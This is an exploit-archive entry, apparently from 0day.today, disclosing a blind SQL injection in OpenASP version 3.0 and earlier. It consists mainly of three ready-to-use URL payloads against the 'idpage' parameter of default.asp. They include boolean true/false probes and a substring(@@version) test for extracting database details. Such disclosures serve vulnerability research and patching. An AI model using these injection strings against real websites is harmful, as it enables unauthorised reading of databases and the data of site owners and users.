OpenASP <= 3.0 Blind SQL Injection Vulnerability

2008-11-17T00:00:00
ID 1337DAY-ID-4189
Type zdt
Reporter StAkeR
Modified 2008-11-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================
OpenASP <= 3.0 Blind SQL Injection Vulnerability
================================================


/*   
    OpenASP <= 3.0 Blind SQL Injection Vulnerability
    -----------------------------------------------------
    by athos - staker
    thanks XaDoS,anyway i've found another sql injection 
    http://openasp.it
    -----------------------------------------------------
    
    default.asp?modulo=pages&idpage=1 or 1=1 (true)
    default.asp?modulo=pages&idpage=1 or 1=2 (false)
    default.asp?modulo=pages&idpage=-1 and substring(@@version,1,1)=4/*
    
*/



#  0day.today [2018-04-13]  #